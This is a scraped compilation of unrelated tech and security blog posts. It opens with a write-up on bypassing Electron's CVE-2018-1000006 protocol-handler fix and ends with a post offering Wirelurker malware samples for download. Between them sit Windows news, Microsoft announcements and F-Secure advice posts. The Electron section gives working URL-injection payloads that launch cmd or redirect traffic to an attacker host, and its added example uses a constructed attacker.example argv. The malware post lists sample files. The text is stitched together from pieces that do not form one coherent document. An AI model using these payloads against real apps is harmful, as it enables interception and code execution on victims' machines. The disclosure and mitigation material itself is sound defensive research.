Under certain circumstances, this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via security@electronjs.org) on May 14, 2018, and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006

On January 22, 2018, Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>

Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters, which led to a bypass of the previous patch with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script> 

Understanding the patch

The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a URL (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
      break;
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}

As is commonly seen, blacklist-based validation is prone to errors and omissions, especially in complex execution environments such as Electron:

  • The patch relies on a static blacklist of available Chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8.
  • The blacklist is implemented using a binary search. Valid flags could be missed by the check if the list is not properly sorted.

Bypass and security implications

We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag, one may specify a set of rules to rewrite domain names for requests issued by libchromiumcontent. This immediately sticks out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:

<!doctype html>
<script>
 window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

https://blog.doyensec.com/public/images/skypeelectronbugpoc.mp4

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proofs-of-concept for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. OAuth tokens), this issue can also be abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason, Electron’s update feature, along with other critical functions, is not affected by this vulnerability.

Future

On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in setAsDefaultProtocolClient:

app.setAsDefaultProtocolClient(protocol, process.execPath, [
  '--your-switches-here',
  '--'
])

or in the Windows protocol handler registry entry:

[Image: secure Windows protocol handler]
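The blacklist check and the dash-dash mitigation described above, modelled in plain Node.js as an added example (not Electron's code and not part of the original post). `modelBlacklistCheck` is a simplified stand-in for `CheckCommandLineArguments`, `isLaunchArgvSafe` is a hypothetical stricter check an app could run on its own argv, and the argv arrays, the three-entry lists and the `attacker.example` host are constructed.

```javascript
// Added example: a simplified model, not Electron's implementation.

// Binary search as used by the patch. Only correct when `list` is sorted.
function binaryIncludes(list, name) {
  let lo = 0, hi = list.length - 1;
  while (lo <= hi) {
    const mid = (lo + hi) >> 1;
    if (list[mid] === name) return true;
    if (list[mid] < name) lo = mid + 1; else hi = mid - 1;
  }
  return false;
}

// "--GPU-launcher=x" -> "gpu-launcher"; arguments that are not switches -> null.
// Lowercasing reflects the January 31 fix for the uppercase bypass.
function switchName(arg) {
  const m = /^-+([^=]+)/.exec(arg);
  return m ? m[1].toLowerCase() : null;
}

// Rough approximation of "starts with a URI scheme" (an assumption of this
// example). A single letter before the colon is a Windows drive, not a scheme.
function looksLikeUrl(arg) {
  return /^[a-z][^\s:]+:/i.test(arg);
}

// Model of the patch: once a URL has been seen, reject blacklisted switches.
// Like the original loop, it stops at a bare "--".
function modelBlacklistCheck(argv, blacklist) {
  let afterUrl = false;
  for (const arg of argv) {
    if (arg === '--') break;
    if (afterUrl) {
      const name = switchName(arg);
      if (name !== null && binaryIncludes(blacklist, name)) return false;
    } else if (looksLikeUrl(arg)) {
      afterUrl = true;
    }
  }
  return true;
}

// Hypothetical stricter check: nothing switch-like may follow a URL at all,
// unless a "--" terminator came first (switch parsing stops there).
function isLaunchArgvSafe(argv) {
  let afterUrl = false;
  for (const arg of argv.slice(1)) {
    if (arg === '--') return true;
    if (afterUrl && arg.startsWith('-')) return false;
    if (looksLikeUrl(arg)) afterUrl = true;
  }
  return true;
}

// Constructed lists: one missing host-rules, one complete, one unsorted.
const GAP_LIST = ['gpu-launcher', 'inspect'];
const FULL_LIST = ['gpu-launcher', 'host-rules', 'inspect'];
const UNSORTED_LIST = ['inspect', 'gpu-launcher', 'host-rules'];

// Constructed argv as Windows would split a handler URL containing a quote.
const INJECTED = ['app.exe', 'myapp://foobar',
                  '--host-rules=MAP * attacker.example', '--foobar='];
// Same input when the handler is registered with "--" before the URL.
const WITH_TERMINATOR = ['app.exe', '--', 'myapp://foobar',
                         '--host-rules=MAP * attacker.example', '--foobar='];
const BENIGN = ['app.exe', 'myapp://open/settings'];

console.log('blacklist without host-rules allows injected argv:',
            modelBlacklistCheck(INJECTED, GAP_LIST));
console.log('blacklist with host-rules allows injected argv:',
            modelBlacklistCheck(INJECTED, FULL_LIST));
console.log('unsorted blacklist allows --inspect:',
            modelBlacklistCheck(['app.exe', 'myapp://x', '--inspect'], UNSORTED_LIST));
console.log('strict check accepts injected argv:', isLaunchArgvSafe(INJECTED));
console.log('strict check accepts argv behind "--":', isLaunchArgvSafe(WITH_TERMINATOR));
```

In an Electron main process the strict check would be called with `process.argv` before any window is created, with the app exiting when it returns false.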

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.

About the authors: Luca Carettoni (@lucacarettoni) and John Villamil (@day6reak)

Original post available here

Pierluigi Paganini

(Security Affairs – Electron apps, hacking)

The post Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix) appeared first on Security Affairs.

Microsoft Secure: Adding transparency and context into industry AV test results

 

Corporate Vice President Brad Anderson recently shared his insights on how Windows Defender Advanced Threat Protection (Windows Defender ATP) evolved to achieve important quality milestones. Our Windows Defender ATP team is committed to delivering industry-leading protection, customer choice, and transparency on the quality of our solutions. In the continued spirit of these principles, we want to share the results of the January-February 2018 test conducted by independent antivirus tester AV-TEST and provide a transparency report that augments the test findings with contextual information to help our customers make informed decisions about Windows Defender ATP adoption.

Download the complete transparency report on January-February 2018 test results

 

At a high-level, the transparency report shows:

  • Protection: Windows Defender Antivirus (Windows Defender AV) achieved a perfect score in Protection, maintaining consistently high scores in this category.
  • Usability (false positives): Windows Defender AV achieved an improved Usability score of 5.5/6.0. Per our telemetry, samples that Windows Defender AV incorrectly classified (false positive) had very low prevalence and are not commonly used in business context.
  • Performance: Windows Defender AV improved this cycle, achieving a 5.5/6.0 Performance score and outperforming the industry in almost all areas. These results reflect the investments we put in optimizing Windows Defender AV performance for high-frequency actions (e.g., application run).

 

While independent tests can help assess a security solution’s capabilities and protections, it is important to understand that antivirus tests are only one part of a complete quality assessment. To truly understand the protection quality of an endpoint protection platform (EPP) and endpoint detection and response (EDR) solution like Windows Defender ATP, its entire set of capabilities must be evaluated.

For instance, while Windows Defender ATP’s antivirus capability achieved a perfect overall Protection score in the January-February 2018 tests and only missed two out of thousands of samples tested, it performed even better than the results suggest. The Windows Defender Security Intelligence team tested the two missed samples against the entire Windows Defender ATP stack to assess these samples’ ability to infect machines in real-world enterprise environments. The team was able to confirm that the two missed samples were detected and mitigated by other components of the Windows Defender ATP stack.

 

As threats become more sophisticated, Microsoft and other security platform vendors continue evolving their product capabilities to detect threats across different attack stages. We hope to see independent testers evolve their methodologies as well. Our customers need greater transparency and optics into what an end-to-end solution can accomplish in terms of total preventive protection, including the quality of individual components like antivirus. Microsoft is highly engaged in working with several independent testers to evolve security testing to focus on end-to-end security stack testing.

Meanwhile, we continue to focus on improving our next-generation antivirus solution while at the same time delivering new innovative capabilities like attack surface reduction and hardware-based isolation, just to name a few. In the Windows 10 April 2018 Update, you can experience these new and improved capabilities in Windows Defender ATP, which provides a complete endpoint protection platform (EPP) and endpoint detection and response (EDR) solution. To see these capabilities for yourself sign up for a 90-day trial of Windows Defender ATP today, or enable Preview features on existing tenants.

 

 

Zaid Arafeh

Senior Program Manager, Windows Defender Research team

Rollout of Windows 10 April Update Halted For Devices With Intel and Toshiba SSDs

Catalin Cimpanu, writing for BleepingComputer: Microsoft has halted the deployment of the Windows 10 April 2018 Update for computers using certain types of Intel and Toshiba solid state drives (SSDs). The Redmond-based OS maker took this decision following multiple user reports about the Windows 10 April 2018 Update not working properly on devices using: Intel SSD 600p Series, Intel SSD Pro 6000p Series, Toshiba XG4 Series, Toshiba XG5 Series, and Toshiba BG3 Series. The Intel and Toshiba issues appear to be different. More specifically, Windows PCs using Intel SSDs would often crash and enter a UEFI screen after reboot, while users of Toshiba SSDs reported lower battery life and SSD drives becoming very hot.

Read more of this story at Slashdot.

Windows 10 build 17666 introduces Dark mode, Cloud Clipboard, Updated Notepad

Here’s what’s new in Windows 10 build 17666

Recently, Microsoft’s newest test build of Windows 10 showcased improvements that are to be officially released in the current year. Amongst various other additions, Microsoft also showcased a dark theme for File Explorer. The company doesn’t have a full version of the dark theme at this point, but it teased how File Explorer would look if the ‘dark mode’ were implemented.

For many people, the new ‘dark mode’ feature is a boon, because it reduces the strain on their eyes while working in the dark. It can also be combined with the night-light option pre-loaded in Windows 10, which is greatly helpful for users working in the dark.

Apart from the dark mode, there are various other features which Microsoft released in their newest update in the build, namely:

  1. Cloud Clipboard
  2. Fluent Design
  3. Notepad

Cloud Clipboard

There are users who often need to switch between their hand-held devices and their computer or laptop. While doing so, they often need to copy and paste data from one device to the other. This often becomes hectic, as they need to plug their devices into the computer.

To eliminate this hassle, Microsoft introduced the Cloud Clipboard in its new update. The Cloud Clipboard lets users access their copied clipboard content across multiple devices. The clipboard now contains a history that keeps track of everything that has been copied. It then synchronizes the copied content in a way similar to the Sets and Timeline sync, so that users can get the copied content on their other devices.

Fluent Design

The released build also showcased a few subtle changes in the design. The operating system in its newest release contains an acrylic title bar. While multitasking, the Alt-Tab switcher keys also include recent Microsoft Edge tabs. However, if people find this feature exasperating, they can choose to disable it under the Settings menu.

Apart from this, Windows 10 also gives users greater flexibility when opening applications or websites. If needed, users can adjust their Sets preference to “Window”. This prevents any further windows from being opened in a new tab unless users explicitly click the + or use the “Tab” button.

Notepad

The final major update brought by Microsoft was to Notepad. The company integrated Bing search with Notepad, which lets users highlight words and search for them right away from Notepad. Apart from this, users can also have results opened on a new page instead of a separate window by enabling Sets.

The newest build promises various features that are advantageous to many users. The Cloud Clipboard and the upgrades to Notepad are features that will make many users upgrade their operating system. Users who want to make use of these features can sign up for Microsoft’s Insiders program and request their copy of Windows 10 build 17666. For other Windows users, the update will start rolling out later in the year.

The post Windows 10 build 17666 introduces Dark mode, Cloud Clipboard, Updated Notepad appeared first on TechWorm.

Windows XP 2018 Edition: This Concept Will Make You Fall In Love With It

Windows XP 2018 Edition: A Commendable Imaginary Approach

Microsoft, the global leader in software technology, has come a long way in terms of development. From Windows XP to Windows 10, the company has introduced many fascinating features that have changed the technology market in many ways. Although it has been 17 years since Windows XP was launched, the operating system still holds immense importance. The company ceased support for XP back in 2014, yet the operating system is still in use by thousands of users even now. As per the latest NEWMARKETSHARE reports, Windows XP holds a significant share of 6.13 percent, which signifies that it is still being used in many businesses and industries. The outdated aspects of Windows XP don’t match up with the versatile features of Windows 10, but what if Windows XP were revived?

What brings Windows XP back into the spotlight is a piece of imagination. How would Windows XP look if it were redesigned to the standards and expectations of 2018? One such vision, from tech YouTuber Kamer Kaan Avdan, has given us a glimpse of how Windows XP could look in 2018.

Kamer Kaan Avdan, a tech YouTuber who has previously introduced concepts of Android 9.0, Windows 11 and iOS 12, rejuvenated and presented the concept of Windows XP with modifications and advancements that leave spectators dumbstruck.

The concept of the 2018 version of Windows XP introduces many alterations and improvements while maintaining the essence and originality of Microsoft’s original Windows XP. Although the refined version maintains its original color, the many alterations have eliminated monotonous and outdated features. The rectangular corners have been replaced by fine curve-shaped corners. Windows 10, being the most recently launched version of the operating system, has influenced the redrafted version to a great extent. The login screen, the power menu and the task bar have been refurbished and are inspired by the features of Windows 10. The most attractive element of the proposed version proves to be the Start menu, which has the touch of the original version combined with additional, modern tiles. The timeline also seems to be influenced by the features of the original version, yet modified. In addition to these significant changes, some appreciable alterations can also be observed in the redesigned mail app and the file explorer, along with many other minor yet commendable changes.

The science and tech YouTuber presented the video as a comparison between the original version and the redrafted version. The video has been created in a very sophisticated manner that is being appreciated by both critics and spectators. There is also a cartoon assistant, who originally debuted in Microsoft Bob. Apart from the technical modifications, the background music, the editing and the simultaneous comparisons all add up to the perfection of the imagined version of this operating system.

The video has gathered considerable popularity, but the fact is that it’s just a version imagined by an individual. No matter how perfectly it has been drafted, it’s just an idea and not an execution. Let’s see whether this amazing approach could transform into a commendable version of Windows.

The post Windows XP 2018 Edition: This Concept Will Make You Fall In Love With It appeared first on TechWorm.

Advancing the future of society with AI and the intelligent edge

The world is a computer, filled with an incredible amount of data. By 2020, the average person will generate 1.5GB of data a day, a smart home 50GB and a smart city, a whopping 250 petabytes of data per day. This data presents an enormous opportunity for developers — giving them a seat of power, while also giving them tremendous responsibility. That’s why this morning at Build, we don’t take our jobs lightly in helping to equip these developers with the tools and guidance to change the world. On stage in Seattle, Microsoft CEO Satya Nadella is describing this new world view, fueled by AI that can power better health care, relieve challenges around basic human needs and create a society that’s more inclusive and accessible.

Helping create a better, safer, more just world is a responsibility we take seriously at Microsoft. We’ve always been committed to the ethical creation and use of technology. As AI increasingly becomes part of our lives, Microsoft’s commitment to advancing human good has never been stronger. Today, we’re announcing AI for Accessibility, a new $25 million, five-year program aimed at harnessing the power of AI to amplify human capability for the more than one billion people around the world with disabilities. AI for Accessibility is a call to action for developers, NGOs, academics, researchers and inventors to accelerate their work for people with disabilities, focusing on three areas: employment, human connection and modern life. It includes grants, technology and AI expertise to accelerate the development of accessible and intelligent AI solutions and builds on recent advancements in Azure Cognitive Services to help developers create intelligent apps that can empower people with hearing, vision and other disabilities. Real-time speech-to-text transcription, visual recognition services and predictive text functionality that suggests words as people type are just a few examples. We’ve seen this impact through the launch of Seeing AI and alt-text which empowers people who are blind or low vision; as well as Helpicto, which helps people with autism.

If AI is the heart of how we can advance society, the intelligent cloud and the intelligent edge are the backbone. In the next 10 years, billions of everyday devices will be connected — smart devices that can see, listen, reason, predict and more, without a 24/7 dependence on the cloud. This is the intelligent edge, and it is the interface between the computer and the real world. The edge takes AI and cloud together to collect and make sense of new information, especially in scenarios that are too dangerous for humans or require new approaches to solve, whether they be on the factory floor or in the operating room.

Today we’re giving developers the tools and guidance to build these possibilities. For example, we’re making it easier to build apps at the edge by open sourcing the Azure IoT Edge Runtime, allowing customers to modify the runtime and customize applications at the edge. We’re giving developers Custom Vision — the first Azure Cognitive Service available for the edge — to build applications that use powerful AI algorithms that interpret, listen, speak and see for edge devices. And we are partnering across both DJI and Qualcomm. Microsoft and DJI, the world’s largest drone company, will collaborate to develop commercial drone solutions so that developers in key vertical segments such as agriculture, construction and public safety can build life-changing solutions, like applications that can help farmers produce more crops. With Qualcomm Technologies Inc., we announced a joint effort to create a vision AI dev kit running Azure IoT Edge, for camera-based IoT solutions. The camera can power advanced Azure services like machine learning and cognitive services that can be downloaded from Azure and run locally on the edge. Other advancements include a preview of Project Brainwave, an architecture for deep neural net processing, that is now available on Azure and on the edge. Project Brainwave makes Azure the fastest cloud to run real-time AI today.

We are also releasing new Azure Cognitive Services updates such as a unified Speech service that makes it easier for developers to add speech recognition, text-to-speech, customized voice models and translation to their applications. In addition, we’re making Azure the best place to develop conversational AI experiences integrated with any agent. New updates to Bot Framework, combined with our new Cognitive Services updates, will power the next generation of conversational bots, enabling richer dialogs and full personality and voice customization to match a company’s brand identity.

It was eight years ago when we shipped Kinect, which was the first AI device with speech, gaze and vision. We then took that technology forward with Microsoft HoloLens. We’ve seen developers build transformative solutions across a multitude of industries, from security to manufacturing to health care and more. As sensor technology has evolved, we see incredible possibilities for combining these sensors with the power of Azure AI services such as machine learning, Cognitive Services and IoT Edge.

Today we are excited to announce a new initiative, Project Kinect for Azure — a package of sensors from Microsoft that contains our unmatched time-of-flight depth camera, with onboard compute, in a small, power-efficient form factor — designed for AI on the edge. Project Kinect for Azure brings together this leading hardware technology with Azure AI to empower developers with new scenarios for working with ambient intelligence.

Similarly, our Speech Devices software development kit announced today delivers superior audio processing from multi-channel sources for more accurate speech recognition, including noise cancellation, far-field voice and more. With this SDK, developers can build for a variety of voice-enabled scenarios like drive-thru ordering systems, in-car or in-home assistants, smart speakers and other digital assistants.

This new age of technology is also fueled by mixed reality, which is opening up new possibilities in the workplace. Today we announced two new apps that will help empower firstline workers, the first workers to interface with customers and triage problems: Microsoft Remote Assist and Microsoft Layout. Microsoft Remote Assist enables remote collaboration via hands-free video calling, letting firstline workers share what they see with any expert on Microsoft Teams, while staying hands on to solve problems and complete tasks together. In a similar vein, Microsoft Layout lets workers design spaces in context with mixed reality, using 3D models for creating room layouts with holograms.

Whether creating a more inclusive and accessible world, solving problems that plague humanity or helping improve the way we work and live, developers are playing a leading role. As new ideas and solutions with AI and intelligent edge emerge, Microsoft will continue to advocate for developers and give them the tools and cloud services that make it possible to build these new solutions to solve real problems. From the top down, we are a developer-led company that continues to invest in coders and give them free rein to solve problems.

Learn more about how we’re empowering developers to build for this future today using Azure and M365, via blog posts from Executive Vice President of Cloud + AI Scott Guthrie and Corporate Vice President of Windows Joe Belfiore.

 

The post Advancing the future of society with AI and the intelligent edge appeared first on The Official Microsoft Blog.

Microsoft Issues Emergency Patch For Critical Flaw In Windows Containers

Just a few days prior to its monthly patch release, Microsoft released an emergency patch for a critical vulnerability in the Windows Host Compute Service Shim (hcsshim) library that could allow remote attackers to run malicious code on Windows computers. Windows Host Compute Service Shim (hcsshim) is an open source library that helps "Docker for Windows" execute Windows Server containers

Yes, your PC is getting slower. But why?

I’m sure you know the feeling. You used to have a nice brand-new computer and everything loaded so quickly. It was a pleasure to use it. But now it is slowing down and you see more and more of the dreaded spinning hourglass, or some other animated mouse pointer. Yes, a computer is really like a marriage. Everything is so nice in the beginning, but friction is often building up over time. Both need some maintenance to avoid problems. 😉

You have to fix your marriage yourself, I’m not an expert in that field. But let’s take a closer look at the computer because it’s a lot easier to understand. First the three most common reasons for slowness.

  1. Your system is getting clogged up by junk. You have unnecessary programs installed and there is virtual garbage everywhere.
  2. Your system is just getting too old. You are running out of hardware capacity as you want to do more with the latest program versions.
  3. You are infected. Malware on the system is stealing your capacity.

I will in this article focus on the first point as it is by far the most common reason. But first a couple of words about the other reasons. Number 2 is pretty obvious. If your system is too old then you need to get a new computer. My only advice here is to consider if you really need a traditional PC or if a tablet could do the work. The mobile devices have a much more modern architecture, which improves security. Number 3 is also quite straightforward. If you suspect this, you just need to check out F-Secure Internet Security or SAFE.

Ok, but now to the real beef. Your problem is most likely a messy system, but what to do? This problem is technically complex and there is probably a large number of smaller factors that all contribute to a significant slowdown. Now you have two options, do it yourself or get a cleaning tool. A lot can actually be done manually. Just Google for “speed up PC”, or something similar, and you have tons of instructions of varying relevance, quality and level of technical competence. Works well for nerds, but many don’t want to go there.

That’s why we made F-Secure Booster. I have been running this tool for a while on my computer, and it’s really a convenient way to keep the system in shape. You can clean a lot automatically just by clicking a button. But Booster also has a fairly comprehensive set of optimizations that you can review and select one by one. So it’s easy to use, but can also keep the more technically savvy users occupied for a while. Quite a nice combination in my opinion.

So why not give F-Secure Booster a try right away? It may push the end-of-life of your PC forward by several years. And makes sure you get less gray hair.

 

Safe surfing,
Micke

 

PS. I wish there was a simple tool for revitalizing marriages too. And I leave it to you to come up with funny analogies between marriages and the problems #2 and #3. 😉

 

Image by Kimchi.sg

Which operating system is the most secure? Four points to remember.

No, you are almost certainly wrong if you tried to guess. A recent study shows that products from Apple actually are at the top when counting vulnerabilities, and that means at the bottom security-wise. Just counting vulnerabilities is not a very scientific way to measure security, and there is a debate over how to interpret the figures. But this is anyway a welcome eye-opener that helps kill old myths.

Apple did for a long time stubbornly deny security problems and their marketing succeeded in building an image of security. Meanwhile Windows was the biggest and most malware-targeted system. Microsoft rolled up the sleeves and fought at the frontline against viruses and vulnerabilities. Their reputation suffered but Microsoft gradually improved in security and built an efficient process for patching security holes. Microsoft had what is most important in security, the right attitude. Apple didn’t and the recent vulnerability study shows the result.

Here’s four points for people who want to select a secure operating system.

  • Forget reputation when thinking security. Windows used to be bad and nobody really cared to attack Apple’s computers before they became popular. The old belief that Windows is unsafe and Apple is safe is just a myth nowadays.
  • There is malware on almost all commonly used platforms. Windows Phone is the only exception with practically zero risk. Windows and Android are the most common systems and malware authors are targeting them most. So the need for an anti-malware product is naturally bigger on these systems. But the so-called antivirus products of today are actually broad security suites. They protect against spam and harmful web sites too, just to mention some examples. So chances are that you want a security product anyway even if your system isn’t one of the main malware targets.
  • So which system is most secure? It’s the one that is patched regularly. All the major systems, Windows, OS X and Linux have sufficient security for a normal private user. But they will also all become unsafe if the security updates are neglected. So security is not really a selection criteria for ordinary people.
  • Mobile devices, phones and tablets, generally have a more modern systems architecture and a safer software distribution process. Do you have to use a desktop or laptop, or can you switch to a tablet? Dumping the big old-school devices is a way to improve security. Could it work for you?

So all this really boils down to the fact that you can select any operating system you like and still be reasonably safe. There are some differences though, but it is more about old-school versus new-school devices. Not about Apple versus Microsoft versus Linux. Also remember that your own behavior affects security more than your choice of device, and that you never are 100% safe no matter what you do.

 

Safe surfing,
Micke

 

Added February 27th. Yes, this controversial study has indeed stirred a heated debate, which isn’t surprising at all. Here’s an article defending Apple. It has flaws and represents a very limited view on security, but one of its important points still stands. If someone still thinks Apple is immortal and invincible, it’s time to wake up. And naturally that this whole debate is totally meaningless for ordinary users. Just keep patching what you have and you will be fine. 🙂 Thanks to Jussi (and others) for feedback.

 

Wirelurker for OSX, iOS (Part I) and Windows (Part II) samples


PART II

Wirelurker for Windows (WinLurker)

Research: Palo Alto Claud Xiao: Wirelurker for Windows

Sample credit: Claud Xiao



PART I


Research: Palo Alto Claud Xiao WIRELURKER: A New Era in iOS and OS X Malware

Palo Alto |Claud Xiao - blog post Wirelurker

Wirelurker Detector https://github.com/PaloAltoNetworks-BD/WireLurkerDetector


Sample credit: Claud Xiao


Download

Download Part I
Download Part II

Email me if you need the password




List of files
List of hashes 

Part II


│   apps.ipa
│   微博 3.4.1.dmg

└───WhatsAppMessenger 2.11.7
            libiconv-2_.dll
            libxml2.dll
            libz_.dll
            mfc100u.dll
            msvcr100.dll
            WhatsAppMessenger 2.11.7.exe
            zlib1.dll
            使用说明.txt


Part I

File listing

├───databases
│       foundation
├───dropped
│   ├───version_A
│   │   │   com.apple.globalupdate.plist
│   │   │   com.apple.machook_damon.plist
│   │   │   globalupdate
│   │   │   machook
│   │   │   sfbase.dylib
│   │   │   watch.sh
│   │   │
│   │   ├───dylib
│   │   │       libcrypto.1.0.0.dylib
│   │   │       libiconv.2.dylib
│   │   │       libimobiledevice.4.dylib
│   │   │       liblzma.5.dylib
│   │   │       libplist.2.dylib
│   │   │       libssl.1.0.0.dylib
│   │   │       libusbmuxd.2.dylib
│   │   │       libxml2.2.dylib
│   │   │       libz.1.dylib
│   │   │
│   │   ├───log
│   │   └───update
│   ├───version_B
│   │       com.apple.globalupdate.plist
│   │       com.apple.itunesupdate.plist
│   │       com.apple.machook_damon.plist
│   │       com.apple.watchproc.plist
│   │       globalupdate
│   │       itunesupdate
│   │       machook
│   │       start
│   │       WatchProc
│   │
│   └───version_C
│       │   com.apple.appstore.plughelper.plist
│       │   com.apple.appstore.PluginHelper
│       │   com.apple.MailServiceAgentHelper
│       │   com.apple.MailServiceAgentHelper.plist
│       │   com.apple.periodic-dd-mm-yy.plist
│       │   com.apple.systemkeychain-helper.plist
│       │   periodicdate
│       │   stty5.11.pl
│       │   systemkeychain-helper
│       │
│       └───manpath.d
│               libcrypto.1.0.0.dylib
│               libiconv.2.dylib
│               libimobiledevice.4.dylib
│               libiodb.dylib
│               liblzma.5.dylib
│               libplist.2.dylib
│               libssl.1.0.0.dylib
│               libusbmuxd.2.dylib
│               libxml2.2.dylib
│               libz.1.dylib
│               libzip.2.dylib
├───iOS
│       sfbase.dylib
│       sfbase_v4000.dylib
│       sfbase_v4001.dylib
│       start
│       stty5.11.pl
├───IPAs
│       7b9e685e89b8c7e11f554b05cdd6819a
│       pphelper
├───original
│       BikeBaron
│       CleanApp
│       FontMap1.cfg
│       start.sh
└───update
        start.sh
        update